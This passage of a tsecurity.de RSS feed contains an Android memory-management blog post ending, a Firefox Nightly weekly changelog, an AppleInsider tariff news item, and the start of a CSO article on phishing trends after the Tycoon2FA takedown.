                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Compose-based example</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">View-based example</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Context</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Passing LocalContext.current to a ViewModel</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Keep <code>Context</code> dependent logic within the UI layer. For non-UI layers, refactor to use <a href="https://developer.android.com/training/dependency-injection">dependency injection</a> or observe UI state using <a href="https://developer.android.com/kotlin/flow">Kotlin flow</a>.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Storing an <code>Activity</code> in a companion object or static variable.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Don’t hold static references to UI components. Refactor to use <a href="https://developer.android.com/training/dependency-injection">dependency injection</a> or observe UI state using <a href="https://developer.android.com/kotlin/flow">Kotlin flow</a>.</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Listeners</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Using <code>DisposableEffect</code> to start a listener but leaving <code>onDispose</code> empty.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Perform the unregistration and <a href="https://developer.android.com/develop/ui/compose/side-effects#disposableeffect">cleanup logic</a> inside the <code>onDispose</code> block.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Registering for SensorManager updates and forgetting to unregister.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Manually call <code>unregisterListener()</code> in <code>onStop()</code> or <code>onDestroy()</code> lifecycle.</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Views</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Holding a reference to a legacy <code>View</code> inside an <code>AndroidView</code> without a release strategy.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Use the <code>release</code> block of the <code>AndroidView</code> composable to clean up the legacy <code>View</code>.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Keeping a reference to a view binding object after the <code>Fragment</code> is destroyed.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Set the binding variable to <code>null</code> inside the <code>onDestroyView</code>() lifecycle method.</span></p>
                    </td>
                </tr>
            </tbody>
        </table>
    </div>
</div>

<h3>Trim memory when app leaves visible state</h3>
<p>Android can reclaim memory from your app or stop your app entirely if necessary to free up memory for critical tasks, as explained in <a href="https://developer.android.com/topic/performance/memory-overview" target="_blank">Overview of memory management</a>. Android will usually reclaim memory from your app when it’s not visible to the user, such as by discarding some of your app’s code and data pages in memory or compressing your heap allocations. When the user resumes your app and your app tries to access some memory that’s been reclaimed, the OS will swap that memory back in on demand. This swapping behavior can be slow, and cause unexpected jank or stutters in your app.</p>
<p>If you leave it to the OS to decide what memory to reclaim from your app, you may find that the OS reclaimed memory that you’ll need shortly after resuming your app. Instead, your app can voluntarily discard memory allocations that it can regenerate later, on demand and at a low cost. To do so, you can implement the <code>ComponentCallbacks2</code> interface. You can implement <code>onTrimMemory</code> in your <code>Activity</code>, <code>Fragment</code>, <code>Service</code>, or even your custom <code>Application</code> class. Using it in the <code>Application</code> class is highly effective for global cache management.</p>
<p>The provided <a href="https://developer.android.com/reference/android/content/ComponentCallbacks2#onTrimMemory(int)" target="_blank">onTrimMemory()</a> callback method notifies your app of lifecycle or memory-related events that present a good opportunity for your app to voluntarily reduce its memory usage.</p>
<p>In terms of memory lifecycle management, your implementation should focus <b>exclusively</b> on <code>TRIM_MEMORY_UI_HIDDEN</code> and <code>TRIM_MEMORY_BACKGROUND</code>. Since Android 14, the system has ceased delivering notifications for other legacy constants, which were formally deprecated in Android 15.</p>
<p><code>TRIM_MEMORY_UI_HIDDEN</code>: This signal indicates that your application's UI has transitioned out of the user's view. This provides an opportunity to release substantial memory allocations tied strictly to the interface—such as Bitmaps, video playback buffers, or complex animation resources.</p>
<p><code>TRIM_MEMORY_BACKGROUND</code>: At this level, your process is residing in the background and is now a candidate for termination to satisfy the system's global memory needs. To extend the duration your process remains in the cached state, and reduce the number of app cold starts, you should aggressively release any resources that can be easily reconstructed once the user resumes their session.</p>

<pre><code>import android.content.ComponentCallbacks2
// Other import statements.

class MainActivity : AppCompatActivity(), ComponentCallbacks2 {

    /**
     * Release memory when the UI becomes hidden or when system resources become low.
     * @param level the memory-related event that is raised.
     */
    override fun onTrimMemory(level: Int) {

        if (level &gt;= ComponentCallbacks2.TRIM_MEMORY_UI_HIDDEN) {
            // Release memory related to UI elements, such as bitmap caches.
        }

        if (level &gt;= ComponentCallbacks2.TRIM_MEMORY_BACKGROUND) {
            // Release memory related to background processing, such as by
            // closing a database connection.
        }
    }
}</code></pre>

<p>Note: The <code>onTrimMemory</code> integration may depend on SDK support. For instance, certain games rely on their game engine to enable this capability. Please check out the <a href="https://developer.android.com/games/optimize/memory-allocation" target="_blank">game memory optimization documents</a>.</p>

<h3>Advanced memory observability with ProfilingManager</h3>
<p>To catch and diagnose memory issues in the field that cannot be reproduced locally, you should leverage the <b>ProfilingManager API</b>. Introduced in Android 15, this advanced observability API allows you to programmatically collect real-user Perfetto profiles.</p>
<p>For teams that lack a dedicated infrastructure to manage and host performance artifacts, Crashlytics is exploring a specialized solution to streamline this workflow. They are inviting developers to <a href="https://docs.google.com/forms/d/e/1FAIpQLSe299a_zSNDfa164z7yyqoDjS05ZDRN86bAQKajuAOFEQ4G-w/viewform" target="_blank">provide feedback</a>.</p>

<p><b>Android 17 introduces new event-driven triggers</b>, most notably <code>TRIGGER_TYPE_OOM</code> and <code>TRIGGER_TYPE_ANOMALY</code>:</p>
<ul>
    <li>The <b>OOM trigger</b> automatically collects a Java heap dump at the exact moment an OutOfMemoryError crash occurs, providing precise allocation states. A collected OOM profile is provided the next time the app starts and registers the <code>registerForAllProfilingResults</code> callback.</li>
    <li>The <b>Anomaly trigger</b> detects severe performance issues, such as excessive binder spam or breached memory thresholds. The memory anomaly delivers a heap dump just prior to the system terminating the app.</li>
</ul>

<pre><code>  val profilingManager = 
applicationContext.getSystemService(ProfilingManager::class.java)
    val triggers = ArrayList<profilingtrigger>()  


    triggers.add(ProfilingTrigger.Builder(
                 ProfilingTrigger.TRIGGER_TYPE_ANOMALY))
    val mainExecutor: Executor = Executors.newSingleThreadExecutor()
    val resultCallback = Consumer<profilingresult> { profilingResult -&gt;
        if (profilingResult.errorCode != ProfilingResult.ERROR_NONE) {
            // upload profile result to server for further analysis          
            setupProfileUploadWorker(profilingResult.resultFilePath)
        } 

    profilingManager.registerForAllProfilingResults(mainExecutor, resultCallback)
    profilingManager.addProfilingTriggers(triggers)</profilingresult></profilingtrigger></code></pre>

<p>
    Once you’ve collected the heap dump, you can download the profile from the server, or locally via adb pull and drag and drop the file into the <a href="http://ui.perfetto.dev/" target="_blank">Perfetto UI</a>. To streamline your memory debugging workflow, use the <a href="https://perfetto.dev/docs/visualization/heap-dump-explorer" target="_blank">Heap Dump Explorer</a>, this is the new default view for heap dumps in Perfetto UI. This tool provides an intuitive interface for inspecting Java heap dumps, allowing you to visualize object allocation hierarchies, compute retained memory sizes, and identify the shortest path from garbage collection root. By leveraging the Heap Dump Explorer, you can rapidly pinpoint memory leaks, bloated retained objects such as excessive bitmap allocations, and analyze heap object allocations all in one place.
</p>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhobASfyUbXdAYD_MOjREv7RUhCwoNJ9sB4QDSImRfA0UrALJqwQ2ovgAF7YRt3f26UeZoIQa-yDxiSDO84gxv1XkQ8acf8E795-IgAe4tl8AM_7m7nSEuj7t_rhtpgM3f-76_lEh-k7Rltku79-VCuIDN_2Q9DRjJyouCKbxg4pDXHV2yey7V8WlG2jQM/s2048/pic5-perfettoheapdump-analyzer.png">
        <img border="0" data-original-height="1039" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhobASfyUbXdAYD_MOjREv7RUhCwoNJ9sB4QDSImRfA0UrALJqwQ2ovgAF7YRt3f26UeZoIQa-yDxiSDO84gxv1XkQ8acf8E795-IgAe4tl8AM_7m7nSEuj7t_rhtpgM3f-76_lEh-k7Rltku79-VCuIDN_2Q9DRjJyouCKbxg4pDXHV2yey7V8WlG2jQM/s16000/pic5-perfettoheapdump-analyzer.png">
    </a>
</div>
<div>
    <i>Use the <a href="https://perfetto.dev/docs/visualization/heap-dump-explorer">Heap Dump Explorer</a>’s embedded flamegraph to visually inspect and navigate through objects with the highest heap allocations.</i>
</div>

<h3>Conclusion</h3>
<p>Optimizing bytecode with R8, adopting image loading best practices, and resolving memory leaks are critical steps toward delivering a high-quality user experience while managing resources effectively under pressure. Adopting these proactive measures helps maintain app stability and performance, preventing unexpected terminations while safeguarding user context. To further your performance expertise, explore our revised <a href="https://developer.android.com/topic/performance/memory" target="_blank">memory guidance</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Nightly: More Kit, More Control – These Weeks in Firefox: Issue 203]]></title>
<description><![CDATA[Highlights

James enabled adaptive autofill in Nightly for testing, which we believe should provide better results in the URL bar when doing autocomplete!
Jack updated the illustrations shown on some of our error pages to match the latest approved designs, giving users more polished artwork when ...]]></description>
<link>https://tsecurity.de/de/3693294/tools/firefox-nightly-more-kit-more-control-these-weeks-in-firefox-issue-203/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693294/tools/firefox-nightly-more-kit-more-control-these-weeks-in-firefox-issue-203/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:32 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Highlights</h3>
<ul>
<li>James <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032547">enabled adaptive autofill in Nightly</a> for testing, which we believe should provide better results in the URL bar when doing autocomplete!</li>
<li>Jack <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031837">updated the illustrations shown on some of our error pages</a> to match the latest approved designs, giving users more polished artwork when the browser encounters connection or security errors!</li>
</ul>
<p><img alt="Internet connection error page with an adorable Kit illustration" class="aligncenter wp-image-2080 size-full" height="652" src="https://blog.nightly.mozilla.org/files/2026/06/image2-1.png" width="1584"></p>
<ul>
<li>Controls for the Memories feature <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032998">can now be set during Smart Window onboarding</a></li>
</ul>
<p><img alt='Two radio button controls for the Smart Window Memories feature, including "Chats in Smart Window" and "Browsing across Firefox"' class="aligncenter wp-image-2078 size-full" height="546" src="https://blog.nightly.mozilla.org/files/2026/06/image4-1-e1780509799577.png" width="500"></p>
<p> </p>
<ul>
<li>We’ve disabled the CSS filter implicitly applied to WebExtension pageAction SVG icons across all release channels starting in Firefox 152, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016509">completing the deprecation</a>
<ul>
<li><b>NOTE:</b> The blog post published at<a href="https://blog.mozilla.org/addons/2026/04/23/webextensions-api-changes-firefox-149-152/"> WebExtensions API changes in Firefox 149-152</a> provides to extensions developers more details about this deprecation and links to the related MDN docs.</li>
</ul>
</li>
</ul>
<h3>Friends of the Firefox team</h3>
<h4><a href="https://bugzilla.mozilla.org/buglist.cgi?title=Resolved%20bugs%20(excluding%20employees)&amp;quicksearch=2031599%2C2033820%2C2034178%2C1930213%2C2035355%2C1611643%2C2020302%2C2026007%2C2031015%2C2035252%2C2036528%2C411384%2C2033780%2C2036199%2C1812100%2C1898257%2C2030070%2C2030072">Resolved bugs (excluding employees)</a></h4>
<p><a href="https://github.com/niklasbaumgardner/NewContributorScraper">Script to find new contributors from bug list</a></p>
<h4>Volunteers that fixed more than one bug</h4>
<ul>
<li>Amin Amir</li>
<li>Pranjali Srivastava</li>
<li>Sam Johnson</li>
</ul>
<h4>New contributors (🌟 = first patch)</h4>
<ul>
<li> 🌟:23rd: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1812100">Regression: The new swipe-to-navigation indicator stucks for a moment, when deciding not to navigate the other page</a></li>
<li>🌟Akeem Omosanya: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035252">Remove commented-out code in SearchService.sys.mjs</a></li>
<li>Amin Amir:
<ul>
<li>🌟<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031599">Fix browsingContext.sys.mjs to assign to #contextCreatedHandled instead of contextCreatedHandled</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033820">Fix missing WITHOUT ROWID SQLite performance optimization in SERPCategorization.sys.mjs</a></li>
</ul>
</li>
<li>🌟Sahaj: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031015">Suggest the default target language for translation after changing the detected source language</a></li>
<li>🌟JIANG Zhirui: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036199">Breakpad build failed on Windows using VS2026 due to removal of stdext</a></li>
<li> John Iweh: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030072">Add “Open in New Tab” and “Open in New Container Tab” options to the context menu for Tabs from Other Devices</a></li>
<li>Jak: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030070">Bookmarks and History – should respect the “When you open a link, image or media in a new tab, switch to it immediately” setting</a></li>
<li>🌟Andy [:rgbcmy]: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1611643">Autoplayed next video should also be PIP</a></li>
<li> konyhéa: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1930213">“Escape” key should collapse the expanded on hover sidebar launcher even if hover is still active.</a></li>
<li> Pranjali Srivastava:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1898257">Remove icon property from sidebar extensions</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026007">Show language-agnostic SelectTranslations context menu item when the source and target languages are the same</a></li>
</ul>
</li>
</ul>
<h3>Project Updates</h3>
<h4>Add-ons / Web Extensions</h4>
<h5>Addon Manager &amp; about:addons</h5>
<ul>
<li>Fixed long-standing regression on the autocomplete and datalist popups for extension inline options pages on about:addons (introduced in Firefox 68 by<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1532724"> Bug 1532724</a>, fix shipping in Firefox 152) –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1595158"> Bug 1595158</a></li>
</ul>
<h5>WebExtensions Framework</h5>
<ul>
<li>Fixed access to web-accessible resources declared with &lt;all_urls&gt; from sandboxed documents (null-principal URLs), restoring extension redirects from the context-menu search flow, starting in Firefox 152 –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033905"> Bug 2033905</a></li>
</ul>
<h5>WebExtension APIs</h5>
<ul>
<li>Added exhaustive test coverage for tabs.move() against additional edge cases related to split-view tabs –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029092"> Bug 2029092</a></li>
</ul>
<h4>DevTools</h4>
<ul>
<li>Andreas Farre improved the Session History tab in the Application panel (still behind devtools.application.sessionHistory.enabled)
<ul>
<li>added support for remote debugging (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2014064">#2014064</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016121">#2016121</a>)</li>
<li>made sure that calls to History.replaceState are reflected in the UI (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037359">#2037359</a>)</li>
</ul>
</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=559949">Julian Descottes [:jdescottes]</a> fixed the most frequent DevTools crash we were observing in Telemetry, adding a guard against IDBTransaction errors when retrieving breakpoints in the Debugger (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030260">#2030260</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=557153">Nicolas Chevobbe [:nchevobbe]</a> fixed the image preview tooltip for relative URLs images in constructed stylesheet (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035503">#2035503</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=559949">Julian Descottes [:jdescottes]</a> reduced the overhead we had because of network requests monitoring by only decoding response content when the user actually want to see the response (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026228">#2026228</a>)</li>
</ul>
<h4>WebDriver</h4>
<ul>
<li>Amin Amir cleaned up an <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031599">incorrect variable assignment</a> in our browsingContext module.</li>
<li>Logan Rosen <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036603">updated stale references and broken links</a> in our documentation about Marionette.</li>
<li>Sameem improved the Marionette and WebDriver BiDi <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2020302">screenshot commands to enforce maximum allowed dimensions</a>.</li>
<li>Leo McArdle fixed <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030964">the regression in the “log.entryAdded” event, which lacked an error message in the “text” field for the messages of type “error”</a>.</li>
<li>Henrik Skupin fixed an issue in Marionette where <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033769">WebDriver:Navigate and WebDriver:Refresh did not handle errors</a> when the underlying navigation failed.</li>
<li>Henrik Skupin <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1839953">improved geckodriver to detect an early Firefox exit during startup on Android</a>, avoiding up to 60 seconds of unnecessary connection attempts.</li>
<li>Henrik Skupin updated the <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028933">geckodriver CI build job to produce a universal macOS binary</a> supporting both x64 and aarch64.</li>
</ul>
<h4>Lint, Docs and Workflow</h4>
<ul>
<li>Sylvestre <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2023411">ported some linters</a> (e.g. file-whitespace, test-manifest-toml, license, file-perm, rejected-words &amp; more) to Rust to help improve the runtime of the code review bot.</li>
<li>Dale has been working on migration to moz-src for <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034040">customkeys</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035086">dom/quota</a> and <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035295">odom/geolocation</a>
<ul>
<li><a href="https://arewemozsrcyet.com/">https://arewemozsrcyet.com/</a></li>
</ul>
</li>
</ul>
<h4>New Tab Page</h4>
<ul>
<li>We did our first region-specific trainhop on May 11th (just 15% of the US), and turned on HNT Nova (and sometimes Widgets) for those clients to get some advance-data of its behaviour in the wild! A note that HNT Nova gets turned on for everybody when Firefox 151 ships on May 19th.
<ul>
<li>We’ll be launching a similar experiment in the DE, probably on May 12th, also at 15% population.</li>
</ul>
</li>
<li>Most of the team is heads down building out a sports-tracking widget, attempting to get that ready in time to be generally available for the upcoming World Cup event.</li>
<li>Dre landed a new world clock widget, which is currently off by default, but pretty snazzy!</li>
</ul>
<p><img alt="World clock widget in New Tab featuring different time zones for YTO, BER, SYD, and LAX." class="aligncenter wp-image-2079 size-full" height="162" src="https://blog.nightly.mozilla.org/files/2026/06/image3-1.png" width="346"></p>
<h4>Search and Urlbar</h4>
<ul>
<li>Nova (URL Bar Design Refresh)
<ul>
<li>Drew and Daisuke continued their work on <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2015612">Nova styling for the Address bar</a> (input and view).</li>
</ul>
</li>
<li>Search and Suggest
<ul>
<li>Drew finalized two bugs for World Cup and sports suggestions, which were landed and uplifted: one to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035322">update the localization string for scheduled games</a> and another to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034350">show both teams’ icons in suggestions</a>. Drew also landed and uplifted a fix for <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035353">rich search suggestion icons being forced into a square aspect ratio</a>.</li>
<li>Standard8 updated Ecosia favicons to the latest branding, including QA testing and publishing.</li>
</ul>
</li>
<li>Settings Redesign (SRD)
<ul>
<li>Stephanie landed a test to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2021512">ensure search suggestion settings are hidden when quicksuggest is disabled</a>, as well as a patch to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031341">resolve TypeScript issues</a> in search.mjs, and is adding test coverage to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2007397">confirm removed search engines are not displayed in the default engines dropdown</a>.</li>
</ul>
</li>
<li>General URL Bar and Component Updates
<ul>
<li>Daisuke landed implementation of the <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1893083">context menu on URL bar results</a>, and a fix to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2020177">show the loading URL in the URL bar when starting up with a homepage</a>.
<ul>
<li>Marco is working on several tasks, including a <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1756564">PDF download / focus stealing issue</a> and <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1924124">allowing arrays to be bound in Sqlite.sys.mjs</a>. Marco also worked on fixes related to Places, such as <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034743">avoiding replacing the favicons database if it is not corrupt</a>.</li>
</ul>
</li>
<li>Standard8 finalized the <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028423">URL bar test manifest split</a>. Standard8 also <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016401">upgraded us to TypeScript 6</a>.</li>
<li>Moritz landed a fix for URL bar abandonment telemetry being recorded when clicking an engine in the unified search button popup (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032973">Bug 2032973</a>), which was also uplifted. Moritz also <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034507">simplified search mode switcher item activation in tests</a>, and made it so that <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036030">the unified search button popup closes when installing an open search engine</a>.</li>
</ul>
</li>
</ul>
<h4>Smart Window</h4>
<ul>
<li>natural language starting with tab close/undo <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035343">2035343</a> with expandable action log <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031508">2031508</a></li>
</ul>
<p><img alt="Tab close and undo actions in Smart Window accompanied by an expandable log of actions taken" class="aligncenter wp-image-2077 size-full" height="256" src="https://blog.nightly.mozilla.org/files/2026/06/image1-1.png" width="220"></p>
<ul>
<li>assistant rendering feedback up/down <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032994">2032994</a> and markdown table <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027029">2027029</a></li>
<li>nova styling blur <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027877">2027877</a> and suggestions <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026823">2026823</a></li>
<li>accessibility screen reader <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028676">2028676</a> and keyboard focus <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037565">2037565</a></li>
<li>optimize conversation starters extra requests <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030005">2030005</a> and caching <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033430">2033430</a></li>
</ul>
<h4>Storybook/Reusable Components/Acorn Design System</h4>
<ul>
<li>Nova token updates occasionally, focused on SRD</li>
</ul>
<h4>UX Fundamentals</h4>
<ul>
<li>Added support for the “SEC_ERROR_CA_CERT_INVALID” certificate error to the Felt Privacy error pages. – <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035942">2035942</a></li>
</ul>
<h4>Settings Redesign</h4>
<ul>
<li>Settings redesign is being tested and will hopefully go out in Firefox 152!</li>
</ul>
<ul>
<li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[New U.S. tariffs hit Apple's supply chain, with no clear exemptions]]></title>
<description><![CDATA[The United States has chosen to apply new 10% tariffs to goods imported from a total of 60 countries, including the countries where nearly every iPhone and Mac are assembled.Apple's supply chain may be impacted by new tariffs. Image credit: IntelThe new tariffs went into effect on Friday, July 24...]]></description>
<link>https://tsecurity.de/de/3691847/ios-mac-os/new-us-tariffs-hit-apples-supply-chain-with-no-clear-exemptions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691847/ios-mac-os/new-us-tariffs-hit-apples-supply-chain-with-no-clear-exemptions/</guid>
<pubDate>Fri, 24 Jul 2026 16:55:54 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The United States has chosen to apply new 10% tariffs to goods imported from a total of 60 countries, including the countries where nearly every <a href="https://appleinsider.com/inside/iphone" title="iPhone" data-kpt="1">iPhone</a> and Mac are assembled.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68223-143803-65917-138146-Intel-chip-worker-xl-xl.jpg" alt="Scientist in full protective suit and goggles holds a tiny rectangular microchip between blue-gloved fingers in a clean, sterile laboratory environment" height="738"><br><span>Apple's supply chain may be impacted by new tariffs. Image credit: Intel</span></div><br>The new tariffs went into effect on Friday, July 24, 2026. They come into force as a 10% blanket import tax imposed by the Trump administration lapsed following a Supreme Court ruling that it was unlawful.<br><br>The new action follows a months-long <a href="https://www.whitehouse.gov/presidential-actions/2026/07/actions-by-the-united-states-in-the-investigations-under-section-301-of-the-trade-act-of-1974-of-the-acts-policies-and-practices-of-60-economies-related-to-the-failure-of-each-economy-to-impose-and/">investigation</a> by the U.S. Trade Representative into the possible use of forced labor in the production of goods in 60 countries.<br><br><br> <a href="https://appleinsider.com/articles/26/07/24/new-us-tariffs-hit-apples-supply-chain-with-no-clear-exemptions?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/245053?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Email threats changed after the Tycoon2FA take-down]]></title>
<description><![CDATA[Traditional phishing techniques are in decline as a result of the disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.



“Phishing volume linked to the platform fell 92% from pre-disruption aver...]]></description>
<link>https://tsecurity.de/de/3691276/it-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691276/it-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</guid>
<pubDate>Fri, 24 Jul 2026 12:33:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional phishing techniques are in decline as a result of the <a href="https://www.csoonline.com/article/4140890/microsoft-leads-takedown-of-tycoon2fa-phishing-service-infrastructure.html">disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform</a>, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.</p>



<p class="wp-block-paragraph">“Phishing volume linked to the platform fell 92% from pre-disruption averages, including QR code phishing and CAPTCHA-gated phishing both declining from their March highs,” the company wrote in <a href="https://www.microsoft.com/en-us/security/blog/2026/07/23/email-threat-landscape-q2-2026-trends-and-insights/">the report</a>.</p>



<p class="wp-block-paragraph">The takedown reduced activity across multiple phishing categories, forcing attackers to shift to newer delivery methods.</p>



<p class="wp-block-paragraph">Riding this shift in were a few notable phishing campaigns, including an automated <a href="https://www.csoonline.com/article/575559/business-email-compromise-scams-take-new-dimension-with-multi-stage-attacks.html">business email compromise</a> (BEC) campaign that reached 42,000 organizations in under three hours, and a multi-stage phishing campaign that used nested email (EML) files, calendar invitations, and a Microsoft authentication redirect to deliver malware.</p>



<p class="wp-block-paragraph">To counter phishing attacks, Microsoft recommends blocking emails containing known bad URLs/ subject fields, enabling password-less authentication methods, or moving to <a href="https://www.csoonline.com/article/4176814/security-experts-caution-mfa-alone-can-no-longer-stop-threat-actors.html">MFA</a> for accounts that still require passwords.</p>



<h2 class="wp-block-heading">Tycoon2FA disruption sent attackers exploring</h2>



<p class="wp-block-paragraph">The take-down of <a href="https://www.csoonline.com/article/4100393/hybrid-2fa-phishing-kits-are-making-attacks-harder-to-detect.html">Tycoon2FA</a> forced its operators to abandon portions of their infrastructure and rework hosting, domain registrations, and delivery mechanisms.</p>



<p class="wp-block-paragraph">“After falling 15% in March and another 22% in April, Tycoon2FA-linked phishing volume dropped 74% in May to just 1.5 million messages, then fell another 20% in June to 1.2 million, by far the lowest monthly volumes observed in at least a year,” Microsoft said.</p>



